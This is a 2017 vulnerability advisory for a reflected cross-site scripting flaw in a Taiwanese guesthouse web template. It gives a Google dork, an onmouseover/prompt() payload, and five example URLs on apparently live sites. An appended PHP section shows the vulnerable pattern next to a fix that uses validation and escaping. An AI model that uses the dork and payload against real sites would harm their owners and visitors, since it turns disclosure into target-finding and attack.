網頁設計 (Web Design) Cross Site Scripting

Published: 2017.02.04
Credit: Ashiyane Digital Security Team
Risk: Low
CWE: CWE-79
CVE: N/A
Local: No
Remote: Yes
Dork: intext:"樂天台東民宿網" inurl:news_board.php

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: 網頁設計 (Web Design) Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://www.letian99.com
|[+]
|[+] Google Dork: intext:"樂天台東民宿網" inurl:news_board.php
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 2017 04 February
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search the dork, choose a target and append "'%22%20onmouseover%3dprompt(955192)%20bad%3d%22" to the URL
|[+] to see the vulnerability.
|--------------------------------------------------------------|
|[+]
|[+] Examples :
|[+]
|[+] http://520.bnb9.com/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://ttbb.yesoks.com/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://t50.goodoks.com/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://smokeycat.oks.tw/en/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+] http://brulee.oks.tw/news_board.php?new_id=82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : modiret
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
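
The string above only has an effect if the new_id value is written into the page without attribute escaping. The PHP below is an added example, not the vendor's code and not part of the original advisory, contrasting that pattern with a hardened version. The function names and the link markup are hypothetical, and it assumes new_id is reflected inside a double-quoted HTML attribute.

```php
<?php
// Added example, not the vendor's code. Assumption: news_board.php echoes
// new_id back into a double-quoted HTML attribute.

// Hypothetical reconstruction of the vulnerable pattern: raw concatenation.
function render_link_vulnerable(string $newId): string
{
    return '<a href="news_board.php?new_id=' . $newId . '">Permalink</a>';
}

// Layer 1: new_id is a record number, so accept digits only.
function parse_new_id(string $raw): ?int
{
    // ctype_digit rejects '', signs, spaces, quotes and any markup.
    if (!ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    return (int) $raw;
}

// Layer 2: escape for the attribute context at output time, so a future
// change to the validation does not reopen the hole.
function escape_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_link_hardened(string $rawId): string
{
    $id = parse_new_id($rawId);
    if ($id === null) {
        // The caller should answer with HTTP 400 here.
        return 'Invalid news id';
    }
    return '<a href="' . escape_attr('news_board.php?new_id=' . $id) . '">Permalink</a>';
}

// Constructed input: the decoded form of the parameter value in the advisory.
$probe = urldecode('82388%22%20onmouseover%3dprompt(955192)%20bad%3d%22');

// The quote closes href, so onmouseover is parsed as a new attribute.
echo render_link_vulnerable($probe), PHP_EOL;
// Escaping alone turns both quotes into &quot; and keeps the value inert.
echo escape_attr($probe), PHP_EOL;
// Validation rejects the value outright; a numeric id renders normally.
echo render_link_hardened($probe), PHP_EOL;
echo render_link_hardened('82388'), PHP_EOL;
```

For free-form parameters that cannot be restricted to digits, the escaping layer is the one that matters, and it has to match the output context (attribute, element body, JavaScript or URL).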




Copyright 2017, cxsecurity.com